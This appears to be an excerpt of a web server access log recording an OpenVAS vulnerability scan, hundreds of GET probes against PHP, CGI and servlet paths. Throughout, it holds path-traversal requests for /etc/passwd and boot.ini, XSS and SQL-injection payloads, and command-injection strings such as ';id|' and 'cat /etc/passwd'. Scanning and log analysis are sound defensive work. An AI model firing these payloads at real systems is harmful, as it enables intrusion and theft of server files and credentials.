 GET /scripts/IBSng/util/show_multistr.php?str=%3Cscript%3Ealert(/ovas-xss-test/)%3C/script%3E
 GET /scripts/LightNEasy.php?do=login
 GET /scripts/Login.php
 GET /scripts/Login/HostLogIn.asp?ie=0
 GET /scripts/Main/WebHome
 GET /scripts/Mondo/lang/sys/login.aspx
 GET /scripts/README.txt
 GET /scripts/User-Edit.asp?UID=1%20OR%201=1
 GET /scripts/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html
 GET /scripts/YaBB.pl?board=;action=imsend;to=%22%3E%3Cscript%3Efoo%3C/script%3E
 GET /scripts/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptions
 GET /scripts/a_viewusers.php?s=1+UNION+SELECT+load_file(0x2f6574632f706173737764),null,null,null,null,null,null+limit+0
 GET /scripts/about
 GET /scripts/about-show.do
 GET /scripts/add.php?lang=../../../../../../../../../etc/passwd%00
 GET /scripts/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E
 GET /scripts/adframe.php?refresh=example.com'
 GET /scripts/admin.php
 GET /scripts/admin/
 GET /scripts/admin/admin.php?sid='
 GET /scripts/admin/helpfiles/AdminHelp.php
 GET /scripts/admin/index.php
 GET /scripts/admin/index.php?page=unexisting../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /scripts/admin/login-default.do
 GET /scripts/admin/login.jsp
 GET /scripts/admin/login.php
 GET /scripts/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET /scripts/admin/setup.php
 GET /scripts/admin/system
 GET /scripts/admin/updatelist.php?filepath=../includes/settings.php
 GET /scripts/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
 GET /scripts/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /scripts/andromeda.php
 GET /scripts/animation.php?board=b&id=1">
 GET /scripts/application/configs/application.ini
 GET /scripts/applicationengine/
 GET /scripts/artmedic_links5/index.php?id=index.php
 GET /scripts/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../boot.ini%00
 GET /scripts/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/athenareg.php?pass=%20;id
 GET /scripts/authentication_index.php?PGV_BASE_DIRECTORY=http://xxxxxxx/
 GET /scripts/awstats.pl?configdir=|echo%20Content-Type:%20text/html;%20echo%20;id|%00
 GET /scripts/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E 
 GET /scripts/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
 GET /scripts/bin/view/TWiki/WebHome
 GET /scripts/bin/view/foswiki/WebHome
 GET /scripts/blob.php
 GET /scripts/blogs.php?tag=gamecat+
 GET /scripts/breakcal/calendar.cgi
 GET /scripts/cal_week.php?op=week&catview=999'
 GET /scripts/calendar.php?year=2004&month=&day=01
 GET /scripts/calendar_scheduler.php?start=">
 GET /scripts/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00
 GET /scripts/cart32.exe/GetLatestBuilds?cart32=%3Cscript%3Efoo%3C/script%3E
 GET /scripts/catalog.php?action=category_show&id='
 GET /scripts/cbgrn/grn.exe
 GET /scripts/cgi/tseekdir.cgi?location=/etc/passwd%00
 GET /scripts/cgicso?query=
 GET /scripts/cgicso?query=AAA
 GET /scripts/charts.php?language=../../../../../../../../../etc/passwd%00A
 GET /scripts/charts/wizard/url.php?${phpinfo()}=1
 GET /scripts/chat/send.php?css=%3cscript%3ealert(upb_xss2.nasl)%3c%2fscript%3e
 GET /scripts/chgpwd.php
 GET /scripts/city.php?hotel_city=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /scripts/classifieds/Site_Admin/admin.php 
 GET /scripts/clwarn.cgi
 GET /scripts/cms/index.php?q=%3Cscript%3Ealert(0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374)%3C/script%3E
 GET /scripts/comment.php?blog=../../../../../../../../../etc/passwd%00
 GET /scripts/comments.php?y=05&m=01&entry=../../../../../../../etc/passwd
 GET /scripts/complete-modules/modules/forcedownload/force_download.php?filename=/etc/passwd
 GET /scripts/config.xml.sav
 GET /scripts/content/dynpage_load.php?file=/boot.ini
 GET /scripts/content/dynpage_load.php?file=/etc/passwd
 GET /scripts/core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../boot.ini%00
 GET /scripts/core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../etc/passwd%00
 GET /scripts/counter.exe
 GET /scripts/cultbooking.php?lang=../../../../../../../../../etc/passwd%00
 GET /scripts/cvsweb.cgi/
 GET /scripts/cwmail.exe
 GET /scripts/data/adminusers.csv
 GET /scripts/db/users.dat
 GET /scripts/dbman/db.cgi?db=no-db
 GET /scripts/dcshop.pl
 GET /scripts/default.aspx
 GET /scripts/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=
 GET /scripts/directory.php?dir=%3Bcat%20/etc/passwd
 GET /scripts/display.php?filename=
 GET /scripts/do/view/TWiki/WebHome
 GET /scripts/docs/CHANGELOG
 GET /scripts/docs/distribution/tour_page1.htm
 GET /scripts/down.php?filename=../../../../../../../../../../../../etc/passwd%00
 GET /scripts/download.php?file=etc/passwd
 GET /scripts/download.php?id=-1+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /scripts/download.php?id=2+AND+1=2+UNION+SELECT+1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET /scripts/download_file.php?path=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/downloadfile.php?dwnfile=../../../../../../../../../../../../../../../etc/passwd
 GET /scripts/downlot.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
 GET /scripts/easymsgb.pl?print=|id|
 GET /scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20
 GET /scripts/editor/assetmanager/assetmanager.asp
 GET /scripts/error.php?err=404
 GET /scripts/extra/image.php?f=../../../../../../../../../etc/passwd
 GET /scripts/findagent.php?country1=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=openvas
 GET /scripts/formmail.pl
 GET /scripts/forum/email.php?forum_contact=">
 GET /scripts/forum_2.php?msg=10&return=
 GET /scripts/forum_answer.php?que_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,6,7,8,9,10/**/FROM/**/expert/*
 GET /scripts/fr_left.php
 GET /scripts/frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en
 GET /scripts/gadgets/Blog/BlogModel.php?path=/etc/passwd%00
 GET /scripts/gallery.php?repertoire=../../../../../../../../../etc/passwd%00
 GET /scripts/gen/obj/collectivite.class.php?path_om=/boot.ini%00
 GET /scripts/gen/obj/collectivite.class.php?path_om=/etc/passwd%00
 GET /scripts/general/login.php
 GET /scripts/get_flash_info.php?ver=1'
 GET /scripts/guestbook.php
 GET /scripts/gzip_loader.php?file=../../../../../../../../../../../../../../../../etc/passwd
 GET /scripts/handlers/getpage.php?id=9999999+UNION+SELECT+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7+FROM+user+LIMIT+1
 GET /scripts/help/copyright.html
 GET /scripts/hints.pl?|id|
 GET /scripts/home
 GET /scripts/home.asp
 GET /scripts/home.php
 GET /scripts/htdocs/index.php
 GET /scripts/html/index.php
 GET /scripts/htsearch.cgi?words=%22%3E%3Cscript%3Efoo%3C%2Fscript%3E
 GET /scripts/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
 GET /scripts/i-mall.cgi?p=|id|
 GET /scripts/imageview.php?idimage='
 GET /scripts/inc/smarty/libs/init.php?sitepath=../../../../../../../../../etc/passwd%00
 GET /scripts/includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwd
 GET /scripts/includes/include.php?cct_base=../../../../../../../../../boot.ini%00
 GET /scripts/includes/include.php?cct_base=../../../../../../../../../etc/passwd%00
 GET /scripts/includes/initsystem.php?loader_file=../../../../../../../../../etc/passwd%00
 GET /scripts/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=/etc/passwd%00
 GET /scripts/includes/tiny_mce/plugins/imagemanager/config.php?basepath=/etc/passwd%00
 GET /scripts/includes/window_top.php?theme_file=../../../../../../../../../etc/passwd%00
 GET /scripts/index.cgi
 GET /scripts/index.html
 GET /scripts/index.js%70
 GET /scripts/index.php
 GET /scripts/index.php 
 GET /scripts/index.php/">
 GET /scripts/index.php/teachers.html?"/>
 GET /scripts/index.php?../../../../../../../boot.ini
 GET /scripts/index.php?../../../../../../../etc/passwd
 GET /scripts/index.php??p=../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?GLOBALS[SKIN]=../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?OPT_Session= OpenVAS_Req
 GET /scripts/index.php?PathPrefix=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?a=19&c=
 GET /scripts/index.php?act=Arcade&do=stats&gameid=1'
 GET /scripts/index.php?action=template&template=../../../../../../../../../../../../../../../../../../etc/passwd
 GET /scripts/index.php?blog=1&title='&more=1&c=1&tb=1&pb=1
 GET /scripts/index.php?cmd=search&keywords=">
 GET /scripts/index.php?entry='
 GET /scripts/index.php?err=3&email=
 GET /scripts/index.php?error=
 GET /scripts/index.php?fct=preview&p=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?file=Liens&op=">
 GET /scripts/index.php?from=";>&help=true&page=What_is_wiki
 GET /scripts/index.php?function=show_all&no=%253cscript>foo%253c/script>
 GET /scripts/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e
 GET /scripts/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+
 GET /scripts/index.php?lng=../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /scripts/index.php?mode=viewid&post_id=1'
 GET /scripts/index.php?offset=[%20Problem%20Here%20]
 GET /scripts/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22
 GET /scripts/index.php?p='openvas
 GET /scripts/index.php?p=../../../../../../../../../..//etc/passwd%00
 GET /scripts/index.php?p=../../../../../../../../../../boot.ini%00
 GET /scripts/index.php?page=../../../../../../../../../../../../../../../../boot.ini%00
 GET /scripts/index.php?page=../../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?page=../../../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?page=../../../../../../../../../etc/passwd
 GET /scripts/index.php?page=../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?page=/etc/passwd
 GET /scripts/index.php?page=1&c=&searchCart=">
 GET /scripts/index.php?page=profile&id=%27%20or%20%27a%27=%27a
 GET /scripts/index.php?page=viewbus&bus='
 GET /scripts/index.php?path=
 GET /scripts/index.php?pg=1&d=../../../../../../../../../../../../../../../../../../
 GET /scripts/index.php?search=%3cscript%3ealert('cmsimple_search_xss.nasl')%3b%3c%2fscript%3e&function=search
 GET /scripts/index.php?site=../../../../../../../../etc/passwd%00
 GET /scripts/index.php?system=../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?theme=../../../../../../../../../etc/passwd%00
 GET /scripts/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
 GET /scripts/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /scripts/index.php?x=admin
 GET /scripts/index.phtml
 GET /scripts/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60;
 GET /scripts/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1
 GET /scripts/innoedit.cgi?download=;id|
 GET /scripts/install.php?dl=/../../../../../../../../../../../../../../etc/passwd
 GET /scripts/interface/logon.do
 GET /scripts/ion-p.exe?page=c:\\winnt\\win.ini
 GET /scripts/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'
 GET /scripts/jobs.php?lang=../../../../../../../../../etc/passwd%00
 GET /scripts/journal.php?id='
 GET /scripts/koha/help.pl?url=koha/../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.pl
 GET /scripts/kommentar.php?filecat=">&fileid=0
 GET /scripts/language/en/text.php/
 GET /scripts/left.php
 GET /scripts/lib/browsefiles.php?dir=/etc
 GET /scripts/lib/browsefolders.php?dir=/etc
 GET /scripts/library/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET /scripts/library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../boot.ini%00
 GET /scripts/library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/loader-wizard.php?page=phpinfo
 GET /scripts/login
 GET /scripts/login.cgi
 GET /scripts/login.cgi?username=&command=simple&do=edit&password=&file=|id|
 GET /scripts/login.php
 GET /scripts/login.php?course=">%3cscript%3ealert(atutor_xss.nasl)%3c%2fscript%3e
 GET /scripts/login.php?ref='%3e%3cscript%3ealert(upb_xss.nasl)%3c%2fscript%3e
 GET /scripts/login.pl
 GET /scripts/login.wdm.
 GET /scripts/login/login.php?sessID=
 GET /scripts/main.php
 GET /scripts/manager/index.php
 GET /scripts/manpage/index.php?command=/etc/passwd
 GET /scripts/medialist.php
 GET /scripts/message.php?skin=">
 GET /scripts/metadot/index.pl?isa=Session&op=auto_login&new_user=&key='[foo]
 GET /scripts/mj_wwwusr
 GET /scripts/moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /scripts/mod.php?mod=publisher&op=allmedia&artid=-1%20union%20select%200x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /scripts/module.php?link=http://xxxx./index.php
 GET /scripts/module.php?module=osTicket&file=/../../../../../../../../../../../etc/passwd
 GET /scripts/module/forum/main.php?website=../../../../../../../../../etc/passwd%00
 GET /scripts/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
 GET /scripts/modules/Submit/index.php?op=pre&title=
 GET /scripts/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
 GET /scripts/myevent.php?myevent_path=/etc/passwd%00
 GET /scripts/mylog.html?screen=/etc/passwd
 GET /scripts/nbmember.cgi?cmd=test
 GET /scripts/newcomment/?ArticleId=">
 GET /scripts/news.php4?nid=-12'+union+select+1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*
 GET /scripts/news.php?wgo=666+and+1=2+union+all+select+0,1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8--
 GET /scripts/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
 GET /scripts/news/index.php
 GET /scripts/nowosci.php?a=1&str=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /scripts/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
 GET /scripts/obm.php
 GET /scripts/oc-admin/index.php
 GET /scripts/oldnews_reader.php?lang=../../../../../../../../../../../../../../../boot.ini%00 
 GET /scripts/oldnews_reader.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 
 GET /scripts/open.php
 GET /scripts/openBrowser.php?url="onload="alert(/openvas-xss-test/)
 GET /scripts/openwebmail.pl
 GET /scripts/order.php?dhaction=check&submit_domain=Register&domain=&ext1=on
 GET /scripts/owls/glossaries/index.php?file=/etc/passwd
 GET /scripts/page.php?id='
 GET /scripts/page.php?page=../../../../../../../../../etc/passwd%00
 GET /scripts/page.php?xPage=
 GET /scripts/pages.php?id=-999999+union+select+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,2,3--
 GET /scripts/password_reminder.php
 GET /scripts/photo.php?id=-9999/**/union/**/select/**/1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET /scripts/photo/templates/admin_default/confirm.tpl.php?nsextt=">
 GET /scripts/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
 GET /scripts/phpsysinfo/inc/hook_admin.inc.php
 GET /scripts/phptonuke.php?filnavn=/etc/passwd
 GET /scripts/pivot/index.php
 GET /scripts/pivotx/modules/module_image.php?image=
 GET /scripts/plugin/themes/default/page_forgot.php?apps_path[themes]=/etc/passwd%00
 GET /scripts/plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /scripts/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00
 GET /scripts/portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /scripts/portfolio_genre.php?id=-67%20union%20select%201,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET /scripts/post.php?newsgroups=
 GET /scripts/print.php?page=../../../../../../../../../etc/passwd
 GET /scripts/printfaq.php?lng=en&pg=1
 GET /scripts/prodpage.cfm?CFID=&CFTOKEN=&CategoryID='openvas
 GET /scripts/productionnu2/fileuploader.php?dir=../../../../../../../../../../../boot.ini%00
 GET /scripts/productionnu2/fileuploader.php?dir=../../../../../../../../../../../etc/passwd%00
 GET /scripts/productionnu2/report.php?StartingDirectory=../../../../../../../../../../../boot.ini%00
 GET /scripts/productionnu2/report.php?StartingDirectory=../../../../../../../../../../../etc/passwd%00
 GET /scripts/profile/index.php
 GET /scripts/quixplorer_2_3/index.php?action=download&dir=&item=../../../../../../../../../etc/passwd&order=name&srt=yes
 GET /scripts/read_body.php?mailbox=&passed_id=&startMessage=1&show_more=0
 GET /scripts/register.php
 GET /scripts/report.php?img_id=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /scripts/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,null,null,null
 GET /scripts/ress.php?page=../../../../../../../../../etc/passwd%00
 GET /scripts/results.php?searchtype=">%3cscript%3ealert('clevercopy_path_disclosure_xss.nasl')%3b%3c%2fscript%3ecategory&searchterm=OpenVAS
 GET /scripts/revert.php?rev=%3Cscript%3Ealert(%27OpenVAS-XSS-Test%27)%3C/script%3E
 GET /scripts/s_form.cgi
 GET /scripts/samples/index.html
 GET /scripts/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00
 GET /scripts/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00
 GET /scripts/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E
 GET /scripts/search
 GET /scripts/search.php3?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /scripts/search.php?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /scripts/search.php?q=
 GET /scripts/search.php?query=we+%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&topic=0&limit=30
 GET /scripts/search.php?s=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /scripts/search.php?searchfor=">
 GET /scripts/search.php?seed=1%27
 GET /scripts/search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2CCONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/site_administrators/%2A%2A/%23 
 GET /scripts/search/results.stm?indexname=>">&style=fancy&spage=60&query=Folder%20name
 GET /scripts/search/show.pl?url=file:/etc/passwd
 GET /scripts/search=%3Cscript%3Ealert('XSS')%3C/script%3E
 GET /scripts/searchresults.php?SearchTerm=">&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14
 GET /scripts/sendcard.php?view=1&id=%27sendcard_sql.nasl
 GET /scripts/services/help/?module=horde&show=menu
 GET /scripts/servlet/one2planet.infolet.InfoServlet?page=
 GET /scripts/setseed-hub/
 GET /scripts/setup.php3?next=1
 GET /scripts/sgdynamo.exe?HTNAME=
 GET /scripts/sgdynamo.exe?HTNAME=sgdynamo.exe
 GET /scripts/shopper.cgi?newpage=../../../../../../etc/passwd
 GET /scripts/shopplus.cgi
 GET /scripts/shouts.php?shoutlimit='
 GET /scripts/show_profile.php?custid=1+and+1=0+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 
 GET /scripts/showcategory.php?cid=9type=1&keyword=Pouya&radio=%3E%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
 GET /scripts/showproduct.php?product=1'
 GET /scripts/signin.php
 GET /scripts/site/login.php
 GET /scripts/sitemap.php?id_site=
 GET /scripts/smarty.php?cwd=../../../../../../../../../etc/passwd%00
 GET /scripts/snpfiltered.pl?t=c&u=
 GET /scripts/spip.php
 GET /scripts/spywall/login.php
 GET /scripts/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 GET /scripts/star57.cgi?download=;id|
 GET /scripts/story.pl?next=../../../../../etc/passwd%00
 GET /scripts/sublink.php?langval=/etc/passwd
 GET /scripts/system/admin/modules.php?install=../../../../../../../../../etc/passwd%00
 GET /scripts/team.rc5-72.php?showlang=../../../../../../../../../etc/passwd%00
 GET /scripts/test/files.xml?action=download&file=/../../wikka.config.php
 GET /scripts/themes/admin/default/modules/show.php?file=/boot.ini
 GET /scripts/themes/admin/default/modules/show.php?file=/etc/passwd
 GET /scripts/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET /scripts/ticketview.php?email=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E&id=1
 GET /scripts/tiki-index.php
 GET /scripts/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../boot.ini%00
 GET /scripts/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../etc/passwd%00
 GET /scripts/title.html
 GET /scripts/titleBar.php
 GET /scripts/tombstone.cfm?ProfileID=
 GET /scripts/topic.php?filename=1%22%3e%3cscript%3ealert(%22%20%2b%20SCRIPT_NAME%20%2b%20%22)%3c%2fscript%3e
 GET /scripts/topic.php?tid='select
 GET /scripts/update.php
 GET /scripts/upload/account-login.php
 GET /scripts/upload/index.php
 GET /scripts/upstnt.php?zid=1&lid=1&cartid='
 GET /scripts/user.cgi?cmd=show&page=/../../../boot.ini
 GET /scripts/users/login.php
 GET /scripts/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
 GET /scripts/utility/TagSelector.aspx?TagEditor=%27)%3C/script%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /scripts/vhosts/ehcp/?op=applyforaccount
 GET /scripts/viewcvs.cgi/?cvsroot=
 GET /scripts/viewfaqs.php?cat=-1+union+select+1
 GET /scripts/viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users--+
 GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0
 GET /scripts/viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4
 GET /scripts/wa.exe?SHOWTPL=
 GET /scripts/web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPage
 GET /scripts/web/help.php
 GET /scripts/web/magmi.php
 GET /scripts/webacc?User.interface=/../webacc/wml
 GET /scripts/webadmin.php?show=%2Fetc%2Fpasswd
 GET /scripts/webapp/home.html?0
 GET /scripts/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD
 GET /scripts/webplus.exe?script=webplus_install_path.nasl
 GET /scripts/webplus?about
 GET /scripts/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
 GET /scripts/welcome.do
 GET /scripts/wiki.php/
 GET /scripts/wiki/index.php
 GET /scripts/windows/function.php?file=/etc/passwd&start=0&end=10
 GET /scripts/wizard/index.php?type=';phpinfo();//
 GET /scripts/wrx.cgi
 GET /scripts/wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /scripts/www/admin/index.php
 GET /scripts/www/index.php
 GET /scripts/www/loader.php/system/">
 GET /scripts/wwwboard.html
 GET /scripts/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=%27
 GET /scripts/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00
 GET /scripts/zp-core/admin.php?a="><script>alert(/openvas-xss-test/)</script>
 GET /scriptsadmin/login.php
 GET /scriptsdefault.aspx
 GET /scriptsprofil.php?id=1%20
 GET /sdbsearch.cgi?stichwort=anything
 GET /seagull/www/index.php
 GET /search/results.stm
 GET /search/search.html
 GET /searchblox/search.html
 GET /segue/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00
 GET /sensorview.php
 GET /seopanel/
 GET /serendipity/index.php
 GET /server-info
 GET /server-status
 GET /server.ini
 GET /service/index.php
 GET /servlet/Help?system_id=pem&book_type=login&help_id=1&locale=/../../../../../../boot.ini/00
 GET /servlet/Help?system_id=pem&book_type=login&help_id=1&locale=/../../../../../../etc/passwd/00
 GET /servlet/com.newatlanta.servletexec.JSP10Servlet
 GET /servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
 GET /servlet/org.apache.catalina.ContainerServlet/
 GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
 GET /servlet/webacc
 GET /servlet/webacc?User.interface=/../webacc/wml
 GET /settings.php
 GET /setup/templates/findcore.php
 GET /sgms/login
 GET /sgs/sgs_installer.php/bin/index.php
 GET /shadowbox/plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /shop/admin/login.html
 GET /shop/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00
 GET /shop/includes/initsystem.php?loader_file=../../../../../../../../../etc/passwd%00
 GET /shop/index.php
 GET /shop/index.php?action=template&template=../../../../../../../../../../../../../../../../../../etc/passwd
 GET /shop/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
 GET /shop/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /shop/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /shop/searchresults.php?SearchTerm=">&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14
 GET /shop/viart_shop.xml
 GET /silex/sitemap.php?id_site=
 GET /simpleid/www/index.php
 GET /simpleinvoices/index.php
 GET /sinecms/index.php
 GET /site.php
 GET /site/index.php/admin/login/index.php
 GET /siteminderagent/forms/login.fcc
 GET /sitex/login.php
 GET /smbind/src/main.php
 GET /smquar.nsf
 GET /sms/index.php?page=main
 GET /sms/plugin/themes/default/page_forgot.php?apps_path[themes]=/etc/passwd%00
 GET /sn/index.php
 GET /snort/alerts.php
 GET /software/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 GET /solgens/index.php
 GET /solr/admin/
 GET /sourcebans/index.php
 GET /space/start
 GET /sphider/changelog
 GET /spip/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%20805245951/*
 GET /spip/spip.php
 GET /sql-ledger/login.pl
 GET /sqlite/LightNEasy.php?do=login
 GET /sqlite/index.php
 GET /squirrelmail/src/login.php
 GET /src/index.php
